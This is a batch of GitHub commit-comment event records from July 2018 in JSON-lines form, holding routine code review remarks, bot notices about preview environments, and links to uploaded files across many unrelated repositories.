{"id":"8011768760","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29817670,"position":7,"line":31,"path":"v5/okapi/api/control/util/settled-util.rst","commit_id":"b4f20cecfb9fbdc887e8e4650f8621fc16f5d051","created_at":"2018-07-24T17:49:46Z","updated_at":"2018-07-24T17:49:46Z","author_association":"COLLABORATOR","body":"Correct. My mistake."}},"created_at":"2018-07-24T17:49:46Z"}
{"id":"8011769217","type":"CommitCommentEvent","actor":{"login":"MJavad"},"repo":{"name":"MJavad/electra-plrun"},"payload":{"comment":{"id":29817672,"position":null,"line":null,"path":null,"commit_id":"b31966c4fb1307fd6e152720a6aa62216719eed2","created_at":"2018-07-24T17:49:51Z","updated_at":"2018-07-24T17:49:51Z","author_association":"OWNER","body":"And why did you comment here? Try opening an issue on bfinject repo."}},"created_at":"2018-07-24T17:49:51Z"}
{"id":"8011774844","type":"CommitCommentEvent","actor":{"login":"monsieurleberre"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29817686,"position":null,"line":null,"path":null,"commit_id":"c5e445b4de42f81d011a7a71f0b15f605ba6e47a","created_at":"2018-07-24T17:50:53Z","updated_at":"2018-07-24T17:50:53Z","author_association":"CONTRIBUTOR","body":"This PR is for Francois eyes only, I would like to re-do it when my other PR called stake-vulnerability has gone in, unless someone else is OK to put it in"}},"created_at":"2018-07-24T17:50:53Z"}
{"id":"8011777386","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817692,"position":null,"line":null,"path":null,"commit_id":"0a5ffcf74d9bfd675729c5f303fd4328dcc753a6","created_at":"2018-07-24T17:51:19Z","updated_at":"2018-07-24T17:51:19Z","author_association":"OWNER","body":"CSS Basic Summary: [css-02-basics-summary.pdf](https://github.com/whyang0808/learning-css/files/2224756/css-02-basics-summary.pdf)\r\n"}},"created_at":"2018-07-24T17:51:19Z"}
{"id":"8011777919","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817693,"position":null,"line":null,"path":null,"commit_id":"aa1d608282a2a58b3b9d3c4396a361832879448d","created_at":"2018-07-24T17:51:25Z","updated_at":"2018-07-24T17:51:25Z","author_association":"CONTRIBUTOR","body":"This replacement does not work, because the py-webhelpers port is at `epoch 2`, while py-graveyard, since it does not specify otherwise, is at `epoch 0`. It looks like the py-graveyard and p5-graveyard ports do not accommodate their obsolete subports specifying an `epoch`; this feature should be added to both ports."}},"created_at":"2018-07-24T17:51:25Z"}
{"id":"8011779088","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29817695,"position":47,"line":62,"path":"Source/Foundation/bsfEngine/GUI/BsGUIContent.h","commit_id":"395ad51f94b0f55484f2be90028dd0dfca3d1bb8","created_at":"2018-07-24T17:51:38Z","updated_at":"2018-07-24T17:51:38Z","author_association":"CONTRIBUTOR","body":"I suspect that the \"handle\" structure that you developed would probably also be a good fit for the \"pass by value, std::move()\" idiom."}},"created_at":"2018-07-24T17:51:38Z"}
{"id":"8011782242","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817703,"position":41,"line":98,"path":"devel/cctools/Portfile","commit_id":"2ecf7c5df88d0a230c12edbfcaa7fa458423b674","created_at":"2018-07-24T17:52:15Z","updated_at":"2018-07-24T17:52:15Z","author_association":"CONTRIBUTOR","body":"I had some reason for that, but it seems its no longer needed. Can remove."}},"created_at":"2018-07-24T17:52:15Z"}
{"id":"8011785071","type":"CommitCommentEvent","actor":{"login":"aslagle"},"repo":{"name":"NYPL-Simplified/circulation-web"},"payload":{"comment":{"id":29817705,"position":42,"line":32,"path":"src/components/EntryPointsContainer.tsx","commit_id":"0bcb9ff2bf933aab31a1d405727a86db4789b532","created_at":"2018-07-24T17:52:47Z","updated_at":"2018-07-24T17:52:47Z","author_association":"CONTRIBUTOR","body":"`Object.assign` does a shallow copy so I think this will modify the collection in `child.props` as well. Just to be safe you might want to do another `Object.assign` on the collection before modifying it."}},"created_at":"2018-07-24T17:52:47Z"}
{"id":"8011785859","type":"CommitCommentEvent","actor":{"login":"LaloGaniza"},"repo":{"name":"LaloGaniza/X"},"payload":{"comment":{"id":29817709,"position":null,"line":null,"path":null,"commit_id":"c5ab87c95637e4e26524ef2e6f02bbe00149c990","created_at":"2018-07-24T17:52:56Z","updated_at":"2018-07-24T17:52:56Z","author_association":"OWNER","body":"programa de prueba\r\n"}},"created_at":"2018-07-24T17:52:56Z"}
{"id":"8011787256","type":"CommitCommentEvent","actor":{"login":"gpshead"},"repo":{"name":"google/styleguide"},"payload":{"comment":{"id":29817714,"position":null,"line":null,"path":null,"commit_id":"1707ccb7d18e4980870ce0ea6ab3d380f9a36a30","created_at":"2018-07-24T17:53:14Z","updated_at":"2018-07-24T17:53:14Z","author_association":"MEMBER","body":"I suspect 3. is the best viable option.  Trying to link sections from the old html to the md is going to be a challenge.  While not how anyone really likes to see highly cited web content handled, I don't think putting work in to preserve direct anchor linkability from old html to new md is worth the time for this one.  People who frequently follow such links will update them over time to point to the markdown."}},"created_at":"2018-07-24T17:53:14Z"}
{"id":"8011788078","type":"CommitCommentEvent","actor":{"login":"MrNoComment"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29817716,"position":49,"line":122,"path":"app/src/main/java/com/example/android/pets/EditorActivity.java","commit_id":"bea7d9080f06d447892c634f6271cb83eef9762b","created_at":"2018-07-24T17:53:23Z","updated_at":"2018-07-24T17:53:23Z","author_association":"NONE","body":"It's not mandatory to overwrite it, it's just better to do so for accessibility compatibility."}},"created_at":"2018-07-24T17:53:23Z"}
{"id":"8011789279","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29817720,"position":12,"line":49,"path":"test/remittance.js","commit_id":"14c15594afebb495e943b67ae4448ce49892d5e3","created_at":"2018-07-24T17:53:37Z","updated_at":"2018-07-24T17:53:37Z","author_association":"OWNER","body":"Great!"}},"created_at":"2018-07-24T17:53:37Z"}
{"id":"8011791780","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817728,"position":5,"line":6,"path":"devel/cctools/Portfile","commit_id":"b950e5ce6d2e10f20091e1995a18f66ba75a6985","created_at":"2018-07-24T17:54:07Z","updated_at":"2018-07-24T17:54:07Z","author_association":"CONTRIBUTOR","body":"The update also enables it by default on Xcode >=9.0 so the bump was needed so users would get this."}},"created_at":"2018-07-24T17:54:07Z"}
{"id":"8011799479","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"dotnet/arcade"},"payload":{"comment":{"id":29817745,"position":104,"line":165,"path":"Documentation/Versioning.md","commit_id":"da51ac2b15f57c186721ad9829892c8ad2054b05","created_at":"2018-07-24T17:55:37Z","updated_at":"2018-07-24T17:55:37Z","author_association":"MEMBER","body":"I would add \"while staying in the range of a short which is what a version element uses\". "}},"created_at":"2018-07-24T17:55:37Z"}
{"id":"8011800295","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29817747,"position":75,"line":75,"path":"v5/okapi/tutorials/walkthrough/autonomous-movement-async.rst","commit_id":"3d2102927ed0c3baef5334a8e88bce6618475efa","created_at":"2018-07-24T17:55:47Z","updated_at":"2018-07-24T17:55:47Z","author_association":"COLLABORATOR","body":"We don't want to be doing this. Do you just want this as a stand-in until `ChassisController` gets its async stuff?"}},"created_at":"2018-07-24T17:55:47Z"}
{"id":"8011805596","type":"CommitCommentEvent","actor":{"login":"nszumowski"},"repo":{"name":"nszumowski/demo-2"},"payload":{"comment":{"id":29817754,"position":null,"line":null,"path":null,"commit_id":"b267ae695a3efbf0cfcd9cbe5019966781dcbd4e","created_at":"2018-07-24T17:56:46Z","updated_at":"2018-07-24T17:56:46Z","author_association":"OWNER","body":"buurp!"}},"created_at":"2018-07-24T17:56:46Z"}
{"id":"8011809042","type":"CommitCommentEvent","actor":{"login":"MJavad"},"repo":{"name":"MJavad/electra-plrun"},"payload":{"comment":{"id":29817759,"position":null,"line":null,"path":null,"commit_id":"b31966c4fb1307fd6e152720a6aa62216719eed2","created_at":"2018-07-24T17:57:27Z","updated_at":"2018-07-24T17:57:27Z","author_association":"OWNER","body":"You can open an issue on bfinject now, I forgot to turn it on."}},"created_at":"2018-07-24T17:57:27Z"}
{"id":"8011810354","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29817764,"position":null,"line":null,"path":null,"commit_id":"aa1d608282a2a58b3b9d3c4396a361832879448d","created_at":"2018-07-24T17:57:41Z","updated_at":"2018-07-24T17:57:41Z","author_association":"CONTRIBUTOR","body":"I filed https://trac.macports.org/ticket/56858 for this."}},"created_at":"2018-07-24T17:57:41Z"}
{"id":"8011815883","type":"CommitCommentEvent","actor":{"login":"frans-johansson"},"repo":{"name":"frans-johansson/rar-aya"},"payload":{"comment":{"id":29817772,"position":null,"line":null,"path":null,"commit_id":"59f1d619e1d41847cc7da316cc0dec99df189369","created_at":"2018-07-24T17:58:44Z","updated_at":"2018-07-24T17:58:44Z","author_association":"OWNER","body":"Consider either Vector3 or Vec3 as more appropriate class names since this only models that one type of vector."}},"created_at":"2018-07-24T17:58:44Z"}
{"id":"8011817241","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29817773,"position":5,"line":5,"path":"DefInjected/HediffGiverSetDef/HediffGiverSets.xml","commit_id":"94b9a4c463d740ed7ff32cde61bd87fbf79d25d4","created_at":"2018-07-24T17:59:00Z","updated_at":"2018-07-24T17:59:00Z","author_association":"CONTRIBUTOR","body":"Podrías cambiarlo por Sabelotodo ya que savant-like seria eso y genio-savant como que no queda bien xD"}},"created_at":"2018-07-24T17:59:00Z"}
{"id":"8011822370","type":"CommitCommentEvent","actor":{"login":"tabatkins"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":29817785,"position":null,"line":null,"path":null,"commit_id":"2c79a766227c4dfc7a3e8c3ef2fa11af393c88a3","created_at":"2018-07-24T17:59:58Z","updated_at":"2018-07-24T17:59:58Z","author_association":"OWNER","body":"Ahahaha, yeah, duh. Sorry about that."}},"created_at":"2018-07-24T17:59:58Z"}
{"id":"8011822374","type":"CommitCommentEvent","actor":{"login":"waterlgndx"},"repo":{"name":"Dynas13/darkstar"},"payload":{"comment":{"id":29817786,"position":13,"line":13,"path":"scripts/globals/abilities/cover.lua","commit_id":"d395854097d482d0c0b48a1a7cdbe5d2230ca40c","created_at":"2018-07-24T17:59:58Z","updated_at":"2018-07-24T17:59:58Z","author_association":"NONE","body":"I'm sure this is work in progress but need an `end;` to end the function and indentation for the body of the function."}},"created_at":"2018-07-24T17:59:58Z"}
{"id":"8011822665","type":"CommitCommentEvent","actor":{"login":"milkshakeiii"},"repo":{"name":"pennmem/brain_viz_unity"},"payload":{"comment":{"id":29817787,"position":6,"line":6,"path":"README.md","commit_id":"5fe4d11df6a9f8f815b6bec0fe3adfb6c6d5e279","created_at":"2018-07-24T18:00:01Z","updated_at":"2018-07-24T18:00:01Z","author_association":"COLLABORATOR","body":"Updated"}},"created_at":"2018-07-24T18:00:01Z"}
{"id":"8011823098","type":"CommitCommentEvent","actor":{"login":"milkshakeiii"},"repo":{"name":"pennmem/brain_viz_unity"},"payload":{"comment":{"id":29817790,"position":7,"line":7,"path":"README.md","commit_id":"5fe4d11df6a9f8f815b6bec0fe3adfb6c6d5e279","created_at":"2018-07-24T18:00:07Z","updated_at":"2018-07-24T18:00:07Z","author_association":"COLLABORATOR","body":"Updated"}},"created_at":"2018-07-24T18:00:07Z"}
{"id":"8011823471","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29817791,"position":null,"line":null,"path":null,"commit_id":"eec16e66fb173097889cd9b2c775ea5c7f5d46b0","created_at":"2018-07-24T18:00:11Z","updated_at":"2018-07-24T18:00:11Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-274](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-274).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-274-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T18:00:11Z"}
{"id":"8011833290","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly-proposals"},"payload":{"comment":{"id":29817812,"position":11,"line":11,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"67f26a0fc661b5856bda7c4145f7ee847391cfeb","created_at":"2018-07-24T18:01:53Z","updated_at":"2018-07-24T18:01:53Z","author_association":"NONE","body":"Since wildfly-proposals is a community repo, it's better to say \"WildFly\" instead of \"EAP\""}},"created_at":"2018-07-24T18:01:53Z"}
{"id":"8011838440","type":"CommitCommentEvent","actor":{"login":"devonestes"},"repo":{"name":"levelhq/level"},"payload":{"comment":{"id":29817823,"position":5,"line":38,"path":"script/bootstrap","commit_id":"6a7eff5e199cf78bdfda80bbaef38c09640e598d","created_at":"2018-07-24T18:02:50Z","updated_at":"2018-07-24T18:02:50Z","author_association":"CONTRIBUTOR","body":"Thanks for keeping this bootstrap script up to date! Not many people actually do that once they write it the first time 🥇 "}},"created_at":"2018-07-24T18:02:50Z"}
{"id":"8011841424","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly-proposals"},"payload":{"comment":{"id":29817829,"position":8,"line":8,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"67f26a0fc661b5856bda7c4145f7ee847391cfeb","created_at":"2018-07-24T18:03:25Z","updated_at":"2018-07-24T18:03:25Z","author_association":"NONE","body":"need to add the following under idseparator: \r\n\r\n:issue-base-url:    https://issues.jboss.org/browse"}},"created_at":"2018-07-24T18:03:25Z"}
{"id":"8011844139","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29817839,"position":null,"line":null,"path":null,"commit_id":"4ceb5514c2523a78406bc7723878fd06020bd592","created_at":"2018-07-24T18:03:56Z","updated_at":"2018-07-24T18:03:56Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-308](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-308).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-308-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-24T18:03:56Z"}
{"id":"8011847899","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly-proposals"},"payload":{"comment":{"id":29817859,"position":17,"line":17,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"67f26a0fc661b5856bda7c4145f7ee847391cfeb","created_at":"2018-07-24T18:04:38Z","updated_at":"2018-07-24T18:04:38Z","author_association":"NONE","body":"Need to add [WFCORE-3970] at the end of this line so it's gets rendered as a link with text \"WFCORE-3970\""}},"created_at":"2018-07-24T18:04:38Z"}
{"id":"8011848933","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"justinmcook/wildfly-proposals"},"payload":{"comment":{"id":29817860,"position":21,"line":21,"path":"elytron/WFCORE-3970-reload-ldap-key-store.adoc","commit_id":"67f26a0fc661b5856bda7c4145f7ee847391cfeb","created_at":"2018-07-24T18:04:50Z","updated_at":"2018-07-24T18:04:50Z","author_association":"NONE","body":"Same here, need to add [EAP7-1052] at the end of this line"}},"created_at":"2018-07-24T18:04:50Z"}
{"id":"8011855740","type":"CommitCommentEvent","actor":{"login":"jdyepes"},"repo":{"name":"MinervaMorales/PhpSymfony"},"payload":{"comment":{"id":29817877,"position":null,"line":null,"path":null,"commit_id":"c43167a4bc66b732aa8e57c6a76b0c7f658658fa","created_at":"2018-07-24T18:06:11Z","updated_at":"2018-07-24T18:06:11Z","author_association":"COLLABORATOR","body":"Hare conflicto xd"}},"created_at":"2018-07-24T18:06:11Z"}
{"id":"8011858484","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29817882,"position":25,"line":1342,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T18:06:44Z","updated_at":"2018-07-24T18:06:44Z","author_association":"COLLABORATOR","body":"Seems enough."}},"created_at":"2018-07-24T18:06:44Z"}
{"id":"8011859903","type":"CommitCommentEvent","actor":{"login":"ofirnk"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29817885,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T18:07:00Z","updated_at":"2018-07-24T18:07:00Z","author_association":"NONE","body":"Just before I get to actually writing a proper issue for this (didn't find\nprevious PR) I'll put quick notes:\n\n* using a docker-compose setup called dockprom from some github repo\n* disabling uptime metrics (using config) is the quickest workaround\n* adding these two words \"in seconds\" really solves the issue (tested &\nverified)\n\nIn order to see the error message I've simulated a metrics pull from the\npush gateway using http://pushgateway:9091/metrics\n\nIt returns http 500 when these uptime metrics exist\n\n(feel free to copy & paste this info into a new issue, or I'll just create\none later when I get back to a desktop)\n\nOn Tue, Jul 24, 2018, 19:40 Michael Weirauch <notifications@github.com>\nwrote:\n\n> Can you please share your setup of PG and Prom (configs, versions) in a\n> new issue and link the old one (or a PR) which should mitigate the issues\n> you have?\n> Also please elaborate if this actually leads to the same issues as before\n> 1.0.6 or if with 1.0.5 different PG pull issues have been present. (I'd\n> assume they are identical)\n> Thanks!\n>\n> We are using the PG just fine and I am wondering what the problem might be.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/micrometer-metrics/micrometer/commit/5632cd4b9b534cb192791f6021ddd6f811cf34c0#commitcomment-29816909>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIDusVH-6Im5F9T1AmLa4Ukalg3Bmvimks5uJ03tgaJpZM4Vc7Kr>\n> .\n>\n"}},"created_at":"2018-07-24T18:07:00Z"}
{"id":"8011866136","type":"CommitCommentEvent","actor":{"login":"mwhahaha"},"repo":{"name":"duritong/puppet-sysctl"},"payload":{"comment":{"id":29817895,"position":48,"line":57,"path":"metadata.json","commit_id":"84bf1fc3a8de8672e74abb30e20721929d34aaf2","created_at":"2018-07-24T18:08:17Z","updated_at":"2018-07-24T18:08:17Z","author_association":"NONE","body":"This is bad, you can't have a tailing comma here"}},"created_at":"2018-07-24T18:08:17Z"}
{"id":"8011867028","type":"CommitCommentEvent","actor":{"login":"mwhahaha"},"repo":{"name":"duritong/puppet-sysctl"},"payload":{"comment":{"id":29817904,"position":59,"line":67,"path":"metadata.json","commit_id":"84bf1fc3a8de8672e74abb30e20721929d34aaf2","created_at":"2018-07-24T18:08:28Z","updated_at":"2018-07-24T18:08:28Z","author_association":"NONE","body":"Same, the trailing comma is invalid json"}},"created_at":"2018-07-24T18:08:28Z"}
{"id":"8011874856","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817927,"position":null,"line":null,"path":null,"commit_id":"ec7648777ef314ef5ade581e737bac6f5f8a1573","created_at":"2018-07-24T18:09:58Z","updated_at":"2018-07-24T18:09:58Z","author_association":"OWNER","body":"CSS Box Model: [css-box-model.pdf](https://github.com/whyang0808/learning-css/files/2224815/css-box-model.pdf)\r\n"}},"created_at":"2018-07-24T18:09:58Z"}
{"id":"8011877240","type":"CommitCommentEvent","actor":{"login":"EmilienM"},"repo":{"name":"duritong/puppet-sysctl"},"payload":{"comment":{"id":29817932,"position":48,"line":57,"path":"metadata.json","commit_id":"84bf1fc3a8de8672e74abb30e20721929d34aaf2","created_at":"2018-07-24T18:10:26Z","updated_at":"2018-07-24T18:10:26Z","author_association":"CONTRIBUTOR","body":"https://github.com/duritong/puppet-sysctl/pull/40"}},"created_at":"2018-07-24T18:10:26Z"}
{"id":"8011881426","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29817944,"position":null,"line":null,"path":null,"commit_id":"c08b3aac6bff0da55f8a134a9a09d4014d7280ab","created_at":"2018-07-24T18:11:14Z","updated_at":"2018-07-24T18:11:14Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-911](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-911).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-911-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T18:11:14Z"}
{"id":"8011885397","type":"CommitCommentEvent","actor":{"login":"TroubleMakerBen"},"repo":{"name":"bitstadium/HockeySDK-Android"},"payload":{"comment":{"id":29817951,"position":5,"line":8,"path":"hockeysdk/src/main/AndroidManifest.xml","commit_id":"8d24cc936fb5338d2c8d24f1e980bcd40a30b887","created_at":"2018-07-24T18:12:01Z","updated_at":"2018-07-24T18:12:01Z","author_association":"MEMBER","body":"Hey @rusmonster,\r\n\r\nI'm sorry to hear that you spent so much time. We've been trying for the past year to find ways to make people check the release notes but couldn't come up with better ways. If you have ideas, please let us know.\r\n\r\nThe next generation of Hockeyapp, [App Center](https://appcenter.ms) does not require this permission, maybe you want to check it out? Our transition/roadmap plan can be found [here](https://hockeyapp.net/appcenter/about/)."}},"created_at":"2018-07-24T18:12:01Z"}
{"id":"8011886088","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29817952,"position":null,"line":null,"path":null,"commit_id":"0325056a225e6d832168bae585e884ec1febfcb9","created_at":"2018-07-24T18:12:09Z","updated_at":"2018-07-24T18:12:09Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-310](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-310).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-310-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-24T18:12:09Z"}
{"id":"8011900483","type":"CommitCommentEvent","actor":{"login":"YetiGoodbye"},"repo":{"name":"YetiGoodbye/calc"},"payload":{"comment":{"id":29817991,"position":5,"line":8,"path":"package.json","commit_id":"cc5e78d7b2ab8c91a50f5f5620fd527666d974f2","created_at":"2018-07-24T18:14:54Z","updated_at":"2018-07-24T18:14:54Z","author_association":"OWNER","body":"I'm looser and now you know my local ip address)"}},"created_at":"2018-07-24T18:14:54Z"}
{"id":"8011902751","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29817999,"position":2,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T18:15:19Z","updated_at":"2018-07-24T18:15:19Z","author_association":"NONE","body":"например сделать переменную next\r\n```\r\nfibonacci = [0, 1]\r\nnext_element = 1\r\n\r\nwhile next_element < 100\r\n...\r\n```\r\nкак-то так"}},"created_at":"2018-07-24T18:15:19Z"}
{"id":"8011905744","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29818007,"position":null,"line":null,"path":null,"commit_id":"47c4d5ead7d508f72031c6ac9472c3630e7cf8f0","created_at":"2018-07-24T18:15:52Z","updated_at":"2018-07-24T18:15:52Z","author_association":"NONE","body":"Won't this cause an overflow?"}},"created_at":"2018-07-24T18:15:52Z"}
{"id":"8011913039","type":"CommitCommentEvent","actor":{"login":"IgnaceBuelens"},"repo":{"name":"IgnaceBuelens/ignacebuelens.github.io"},"payload":{"comment":{"id":29818033,"position":null,"line":null,"path":null,"commit_id":"ef76a3eae8889bc16077c8d89ef74e707a82a061","created_at":"2018-07-24T18:17:14Z","updated_at":"2018-07-24T18:17:14Z","author_association":"OWNER","body":"[Algemene Voorwaarden.pdf](https://github.com/IgnaceBuelens/ignacebuelens.github.io/files/2224839/Algemene.Voorwaarden.pdf)\r\n![smooved cj](https://user-images.githubusercontent.com/38295688/43157769-3c99c166-8f7e-11e8-81f9-0fdd932acece.png)\r\n"}},"created_at":"2018-07-24T18:17:14Z"}
{"id":"8011922175","type":"CommitCommentEvent","actor":{"login":"mcallaghan-sandvine"},"repo":{"name":"google/styleguide"},"payload":{"comment":{"id":29818052,"position":null,"line":null,"path":null,"commit_id":"1707ccb7d18e4980870ce0ea6ab3d380f9a36a30","created_at":"2018-07-24T18:19:01Z","updated_at":"2018-07-24T18:19:01Z","author_association":"NONE","body":"Agreed RE 3.\r\n\r\nNote that item 2. still needs doing."}},"created_at":"2018-07-24T18:19:01Z"}
{"id":"8011922742","type":"CommitCommentEvent","actor":{"login":"hiteshkumardasika"},"repo":{"name":"vaddipar/fbSpam"},"payload":{"comment":{"id":29818054,"position":32,"line":32,"path":"src/main/java/com/vaddipar/fbspam/utilities/FacebookHelper.java","commit_id":"9d89ac7a76855db5cb90e9a77024bdec9af05d7d","created_at":"2018-07-24T18:19:09Z","updated_at":"2018-07-24T18:19:09Z","author_association":"NONE","body":"FYI...the method is doing more than what it should be doing. Isnt it just to written a date object from the date string. Just a pointer on the \"better structure\""}},"created_at":"2018-07-24T18:19:09Z"}
{"id":"8011927829","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29818062,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T18:20:08Z","updated_at":"2018-07-24T18:20:08Z","author_association":"MEMBER","body":"That doesnt help at all"}},"created_at":"2018-07-24T18:20:08Z"}
{"id":"8011938034","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29818090,"position":null,"line":null,"path":null,"commit_id":"b2ec3de9adb00596b343e2fb3d9870ebe0c61f0f","created_at":"2018-07-24T18:21:58Z","updated_at":"2018-07-24T18:21:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-363](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-363).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-363-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T18:21:58Z"}
{"id":"8011941370","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-kodillla-java"},"payload":{"comment":{"id":29818094,"position":4,"line":4,"path":"kodilla-patterns3/src/main/java/com/kodilla/patterns3/observer/homework/TeachersHomeworkQueue.java","commit_id":"99ba58df132a12aeadd0fd6d44b71393630ddd96","created_at":"2018-07-24T18:22:35Z","updated_at":"2018-07-24T18:22:35Z","author_association":"NONE","body":"Brak modyfikatorów dostępu"}},"created_at":"2018-07-24T18:22:35Z"}
{"id":"8011942186","type":"CommitCommentEvent","actor":{"login":"vipinmuralee"},"repo":{"name":"vipinmuralee/OpenCart"},"payload":{"comment":{"id":29818097,"position":null,"line":null,"path":null,"commit_id":"9d0091b1070c5c5a2b78c3230c2465f1cf095781","created_at":"2018-07-24T18:22:44Z","updated_at":"2018-07-24T18:22:44Z","author_association":"OWNER","body":"asa"}},"created_at":"2018-07-24T18:22:44Z"}
{"id":"8011946703","type":"CommitCommentEvent","actor":{"login":"nniiicc"},"repo":{"name":"OpenDataLiteracy/WA-State-Library-2018"},"payload":{"comment":{"id":29818110,"position":null,"line":null,"path":null,"commit_id":"45a5b4d8e3c45f062f0e54aeed048cd6a322d4eb","created_at":"2018-07-24T18:23:36Z","updated_at":"2018-07-24T18:23:36Z","author_association":"CONTRIBUTOR","body":"Cool - could you post that spreadsheet at some point? Or direct me to where it is? Thats a great resource ! "}},"created_at":"2018-07-24T18:23:36Z"}
{"id":"8011948076","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29818113,"position":null,"line":null,"path":null,"commit_id":"23632017e134275af81a7dc8a27d828396a50389","created_at":"2018-07-24T18:23:52Z","updated_at":"2018-07-24T18:23:52Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-274](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-274).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-274-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T18:23:52Z"}
